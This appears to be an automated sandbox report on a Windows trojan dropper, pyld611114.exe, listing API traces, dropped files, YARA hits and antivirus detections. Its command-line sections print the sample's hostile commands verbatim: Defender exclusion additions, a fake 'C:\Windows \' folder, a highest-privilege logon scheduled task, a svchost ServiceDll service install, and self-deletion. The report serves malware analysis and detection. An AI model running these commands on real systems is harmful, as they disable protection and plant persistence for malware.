NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00024000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00160000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00026000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00113000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0001a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00161000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Aug. 26, 2024, 9:28 a.m.	process_identifier: 2180 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002897000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

A process attempted to delay the analysis task. (1 event)

description

pyld611114.exe tried to sleep 293 seconds, actually delayed analysis time by 3 seconds

Creates executable files on the filesystem (13 events)

file	C:\Windows\System32\ucrtbased.dll
file	C:\Windows\System32\libcrypto-3-x64.dll
file	C:\Windows\System32\libwinpthread-1.dll
file	C:\Windows\System32\libcurl.dll
file	C:\Windows\System32\libintl-9.dll
file	C:\Windows\System32\libssl-3-x64.dll
file	C:\Windows\System32\usvcinsta64.exe
file	C:\Windows\System32\libiconv-2.dll
file	C:\Windows\System32\console_zero.exe
file	C:\Windows\System32\vcruntime140d.dll
file	C:\Windows\System32\zlib1.dll
file	C:\Windows \System32\printui.dll
file	C:\Windows\System32\libpq.dll

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (19 events)

cmdline	cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
cmdline	cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
cmdline	powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
cmdline	cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
cmdline	schtasks /delete /tn "console_zero" /f
cmdline	cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
cmdline	cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
cmdline	cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
cmdline	cmd.exe /c mkdir "\\?\C:\Windows \System32"
cmdline	cmd.exe /c start "" "C:\Windows \System32\printui.exe"
cmdline	cmd.exe /c schtasks /delete /tn "console_zero" /f
cmdline	cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
cmdline	cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
cmdline	powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
cmdline	schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
cmdline	cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
cmdline	sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
cmdline	powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
cmdline	cmd.exe /c sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f && sc start x748413

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (6 events)

Time & API	Arguments	Status	Return
Process32NextW Aug. 26, 2024, 9:28 a.m.	snapshot_handle: 0x0000000000000034 process_name: conhost.exe process_identifier: 1492	1	1
Process32NextW Aug. 26, 2024, 9:28 a.m.	snapshot_handle: 0x0000000000000034 process_name: pw.exe process_identifier: 1932	1	1
Process32NextW Aug. 26, 2024, 9:28 a.m.	snapshot_handle: 0x0000000000000034 process_name: cmd.exe process_identifier: 2120	1	1
Process32NextW Aug. 26, 2024, 9:28 a.m.	snapshot_handle: 0x0000000000000034 process_name: conhost.exe process_identifier: 2156	1	1
Process32NextW Aug. 26, 2024, 9:28 a.m.	snapshot_handle: 0x0000000000000034 process_name: powershell.exe process_identifier: 2180	1	1
Process32NextW Aug. 26, 2024, 9:28 a.m.	snapshot_handle: 0x0000000000000034 process_name: svchost.exe process_identifier: 2396	1	1

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 26, 2024, 9:28 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 26, 2024, 9:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 26, 2024, 9:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 26, 2024, 9:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (50 out of 137 events)

url	https://ipinfo.io/json
url	http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0
url	http://www.microsoft.com/pki/certs/MicRooCerAut2011_2011_03_22.crt0
url	http://microsoft.com0
url	http://www.microsoft.com/pkiops/certs/MicCodSigPCA2011_2011-07-08.crt0
url	http://www.microsoft.com/pkiops/docs/primarycps.htm0
url	https://curl.se/docs/alt-svc.html
url	https://curl.se/docs/http-cookies.html
url	http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0
url	http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0
url	http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0
url	http://worldtimeapi.org/api/timezone/Etc/UTC
url	http://www.microsoft.com/PKI/docs/CPS/default.htm0
url	http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0
url	https://curl.se/docs/hsts.html
url	http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl0a
url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://users.ocsp.d-trust.net03
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.e-szigno.hu/SZSZ/0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	http://www.certplus.com/CRL/class3.crl0
url	http://logo.verisign.com/vslogo.gif0
url	http://www.acabogacia.org/doc0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	https://www.catcert.net/verarrel
url	http://www.sk.ee/cps/0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	http://crl.chambersign.org/chambersroot.crl0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0

Yara rule detected in process memory (50 out of 99 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	task schedule	rule	schtasks_Zero
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications smtp	rule	network_smtp_raw
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	task schedule	rule	schtasks_Zero
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications smtp	rule	network_smtp_raw
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI

Uses Windows utilities for basic Windows functionality (12 events)

cmdline	reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f
cmdline	schtasks /delete /tn "console_zero" /f
cmdline	cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
cmdline	cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
cmdline	cmd.exe /c mkdir "\\?\C:\Windows \System32"
cmdline	cmd.exe /c schtasks /delete /tn "console_zero" /f
cmdline	cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
cmdline	schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
cmdline	cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\test22\AppData\Local\Temp\pyld611114.exe"
cmdline	sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
cmdline	cmd.exe /c sc create x748413 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x748413\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x748413.dat" /f && sc start x748413
cmdline	sc start x748413

Installs itself for autorun at Windows startup (4 events)

service_name	x748413	service_path	C:\Windows\System32\svchost.exe -k DcomLaunch
reg_key	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\x748413\Parameters\ServiceDll	reg_value	C:\Windows\System32\x748413.dat
cmdline	cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
cmdline	schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f

Created a service where a service was also not started (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW Aug. 26, 2024, 9:36 a.m.	service_start_name: start_type: 2 password: display_name: filepath: C:\Windows\System32\svchost.exe -k DcomLaunch service_name: x748413 filepath_r: C:\Windows\System32\svchost.exe -k DcomLaunch desired_access: 983551 service_handle: 0x00000000002e6850 error_control: 1 service_type: 16 service_manager_handle: 0x00000000002e6820	1	3041360	0

Drops a binary and executes it (3 events)

file	C:\Windows\System32\usvcinsta64.exe
file	C:\Windows \System32\printui.exe
file	C:\Windows\System32\console_zero.exe

Powershell script adds registry entries (1 event)

cmd

cmd.exe /c start "" "c:\windows\system32\console_zero.exe"timeout /t 10 /nobreak reg add hklm\system\currentcontrolset\services\x748413\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x748413.dat" /f cmd.exe /c start "" "c:\windows\system32\usvcinsta64.exe"powershell -command "add-mppreference -exclusionpath 'c:\windows \system32'; add-mppreference -exclusionpath 'c:\windows\system32';"cmd.exe /c powershell -command "add-mppreference -exclusionpath 'c:\windows \system32'"schtasks /delete /tn "console_zero" /fcmd.exe /c schtasks /create /tn "console_zero" /sc onlogon /tr "c:\windows\system32\console_zero.exe" /rl highest /fcmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "c:\windows \""c:\windows\system32\console_zero.exe" cmd.exe /c powershell -command "add-mppreference -exclusionpath 'c:\windows\system32'"cmd.exe /c mkdir "\\?\c:\windows \system32"cmd.exe /c start "" "c:\windows \system32\printui.exe""c:\windows\system32\usvcinsta64.exe" cmd.exe /c schtasks /delete /tn "console_zero" /fcmd.exe /c timeout /t 10 /nobreak && del "c:\windows\system32\usvcinsta64.exe"cmd.exe /c powershell -command "add-mppreference -exclusionpath '%systemdrive%\windows \system32'; add-mppreference -exclusionpath '%systemdrive%\windows\system32';"powershell -command "add-mppreference -exclusionpath 'c:\windows\system32'"schtasks /create /tn "console_zero" /sc onlogon /tr "c:\windows\system32\console_zero.exe" /rl highest /fcmd.exe /c timeout /t 10 /nobreak && del "c:\users\test22\appdata\local\temp\pyld611114.exe"sc create x748413 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto powershell -command "add-mppreference -exclusionpath 'c:\windows \system32'"cmd.exe /c sc create x748413 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x748413\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x748413.dat" /f && sc start x748413"c:\windows \system32\printui.exe" sc start x748413

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2452 resumed a thread in remote process 2520
Process injection	Process 2336 resumed a thread in remote process 1688
Process injection	Process 536 resumed a thread in remote process 2964
NtResumeThread Aug. 26, 2024, 9:28 a.m.	thread_handle: 0x0000000000000060 suspend_count: 0 process_identifier: 2520	1	0	0
NtResumeThread Aug. 26, 2024, 9:29 a.m.	thread_handle: 0x0000000000000060 suspend_count: 0 process_identifier: 1688	1	0	0
NtResumeThread Aug. 26, 2024, 9:36 a.m.	thread_handle: 0x0000000000000060 suspend_count: 0 process_identifier: 2964	1	0	0

File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 99)
Skyhigh	BehavesLike.Win64.Injector.vh
ALYac	Gen:Variant.Ser.Lazy.7003
VIPRE	Gen:Variant.Ser.Lazy.7003
Sangfor	Trojan.Win64.Lazy.Vkk4
K7AntiVirus	Trojan ( 005b7a9a1 )
BitDefender	Gen:Variant.Ser.Lazy.7003
K7GW	Trojan ( 005b7a9a1 )
Cybereason	malicious.d87318
Arcabit	Trojan.Ser.Lazy.D1B5B
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/GenKryptik.GZFK
APEX	Malicious
McAfee	Artemis!43BCE45D8731
Avast	Win64:Evo-gen [Trj]
ClamAV	Win.Dropper.Lazy-10032893-0
Alibaba	Trojan:Win64/GenKryptik.d91f77d0
MicroWorld-eScan	Gen:Variant.Ser.Lazy.7003
Rising	Trojan.Kryptik!8.8 (CLOUD)
Emsisoft	Gen:Variant.Ser.Lazy.7003 (B)
F-Secure	Trojan.TR/AD.Nekark.dzein
DrWeb	Trojan.Siggen29.25402
McAfeeD	ti!9AE4784F0B13
Trapmine	suspicious.low.ml.score
FireEye	Gen:Variant.Ser.Lazy.7003
Sophos	Mal/Generic-S
Ikarus	Trojan.Win64.Agent
Google	Detected
Avira	TR/AD.Nekark.dzein
MAX	malware (ai score=82)
Antiy-AVL	Trojan/Win32.Phonzy
Gridinsoft	Trojan.Win64.Kryptik.sa
Microsoft	Trojan:Win32/Phonzy.A!ml
GData	Gen:Variant.Ser.Lazy.7003
Varist	W64/ABRisk.TIUU-6574
AhnLab-V3	Malware/Win.Generic.C5660176
DeepInstinct	MALICIOUS
Malwarebytes	Floxif.Virus.FileInfector.DDS
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H09HJ24
Fortinet	W64/GenKryptik.GZFK!tr
AVG	Win64:Evo-gen [Trj]
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_70% (D)
alibabacloud	Trojan:Win/Phonzy.A9nj

pyld611114.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All